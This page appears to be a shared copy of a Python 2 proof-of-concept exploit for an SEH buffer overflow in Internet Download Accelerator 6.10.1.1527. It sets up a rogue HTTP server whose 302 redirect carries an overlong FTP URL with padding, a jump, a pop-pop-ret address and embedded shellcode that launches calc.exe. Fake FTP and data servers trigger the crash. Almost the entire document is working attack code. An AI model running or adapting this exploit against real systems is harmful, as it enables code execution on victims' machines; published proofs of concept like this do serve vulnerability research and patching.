扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 |
#!/usr/bin/python # # Exploit Title: IDA 6.10.1.1527 FTP SEH Universal exploit. # Exploit Author: Fady Mohamed Osman (@fady_osman) # Exploit-db : http://www.exploit-db.com/author/?a=2986 # Youtube : https://www.youtube.com/user/cutehack3r # Date: Jan 2, 2017 # Vendor Homepage: http://westbyte.com/ # Software Link: http://westbyte.com/index.phtml?page=support&tmp=1&lng=English&product=Internet%20Download%20Accelerator. # Version: 6.10.1.1527 # Tested on: IDA 6.10.1.1527 Free Version - Windows 7 SP1 - Windows 10. # -------------- # Internet download accelerator suffers from a BOF when an FTP Download of file with # long name fails. # -------------- # To Exploit this issue: # 1- Run HTTP server that will redirect to the FTP file with long name. # 2- The ftp server will answer to the commands sent then will open a data connection. # 3- The script will send an empty file list and close the connection to trigger the BOF condition. # 5- Happy new year :D. import SocketServer import threading # IP to listen to, needed to construct PASV response so 0.0.0.0 is not gonna work. ip = "192.168.1.100" ipParts = ip.split(".") PasvResp = "("+ ipParts[0]+ "," + ipParts[1]+ "," + ipParts[2] + "," + ipParts[3] + ",151,130)" # Run Calc.exe buf=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") class HTTPHandler(SocketServer.BaseRequestHandler): """ The request handler class for our HTTP server. This is just so we don't have to provide a suspicious FTP link with long name. """ def handle(self): # self.request is the TCP socket connected to the client self.data = self.request.recv(1024).strip() print "[*] Recieved HTTP Request" print "[*] Sending Redirction To FTP" # just send back the same data, but upper-cased # SEH Offset 336 - 1056 bytes for the payload - 0x10011b53 unzip32.dll ppr 0x0c payload = "ftp://192.168.1.100/"+ 'A' * 336 + "\xeb\x06\x90\x90" + "\x53\x1b\x01\x10" + buf + "B" * (1056 - len(buf)) self.request.sendall("HTTP/1.1 302 Found\r\n" + "Host: Server\r\nConnection: close\r\nLocation: "+ payload+ "\r\nContent-type: text/html; charset=UTF-8\r\n\r\n") print "[*] Redirection Sent..." class FTPHandler(SocketServer.BaseRequestHandler): """ The request handler class for our FTP server. This will work normally and open a data connection with IDA. """ def handle(self): # User Command self.request.sendall("220 Nasty FTP Server Ready\r\n") User = self.request.recv(1024).strip() print "[*] Recieved User Command: " + User self.request.sendall("331 User name okay, need password\r\n") # PASS Command Pass = self.request.recv(1024).strip() print "[*] Recieved PASS Command: " + Pass self.request.sendall("230-Password accepted.\r\n230 User logged in.\r\n") # SYST Command Syst = self.request.recv(1024).strip() print "[*] Recieved SYST Command: " + Syst self.request.sendall("215 UNIX Type: L8\r\n") # TYPE Command Type = self.request.recv(1024).strip() print "[*] Recieved Type Command: " + Type self.request.sendall("200 Type set to I\r\n") # REST command Rest = self.request.recv(1024).strip() print "[*] Recieved Rest Command: " + Rest self.request.sendall("200 OK\r\n") # CWD command Cwd = self.request.recv(2048).strip() print "[*] Recieved CWD Command: " + Cwd self.request.sendall("250 CWD Command successful\r\n") # PASV command. Pasv = self.request.recv(1024).strip() print "[*] Recieved PASV Command: " + Pasv self.request.sendall("227 Entering Passive Mode " + PasvResp + "\r\n") #LIST List = self.request.recv(1024).strip() print "[*] Recieved LIST Command: " + List self.request.sendall("150 Here comes the directory listing.\r\n226 Directory send ok.\r\n") class FTPDataHandler(SocketServer.BaseRequestHandler): """ The request handler class for our FTP Data connection. This will send useless response and close the connection to trigger the error. """ def handle(self): # self.request is the TCP socket connected to the client print "[*] Recieved FTP-Data Request" print "[*] Sending Empty List" # just send back the same data, but upper-cased self.request.sendall("total 0\r\n\r\n") self.request.close() if __name__ == "__main__": HOST, PORT = ip, 8000 SocketServer.TCPServer.allow_reuse_address = True print "[*] Starting the HTTP Server." # Create the server, binding to localhost on port 8000 HTTPServer = SocketServer.TCPServer((HOST, PORT), HTTPHandler) # Running the http server (using a thread so we can continue and listen for FTP and FTP-Data). HTTPThread = threading.Thread(target=HTTPServer.serve_forever) HTTPThread.daemon = True HTTPThread.start() print "[*] Starting the FTP Server." # Running the FTP server. FTPServer = SocketServer.TCPServer((HOST, 21), FTPHandler) # Running the FTP server thread. FTPThread = threading.Thread(target=FTPServer.serve_forever) FTPThread.daemon = True FTPThread.start() print "[*] Opening the data connection." # Opening the FTP data connection - DON'T CHANGE THE PORT. FTPData = SocketServer.TCPServer((HOST, 38786), FTPHandler) # Running the FTP Data connection Thread. DataThread = threading.Thread(target=FTPData.serve_forever) DataThread.daemon = True DataThread.start() print "[*] Listening for FTP Data." # Making the main thread wait. print "[*] To exit the script please press any key at any time." raw_input() |
体验盒子
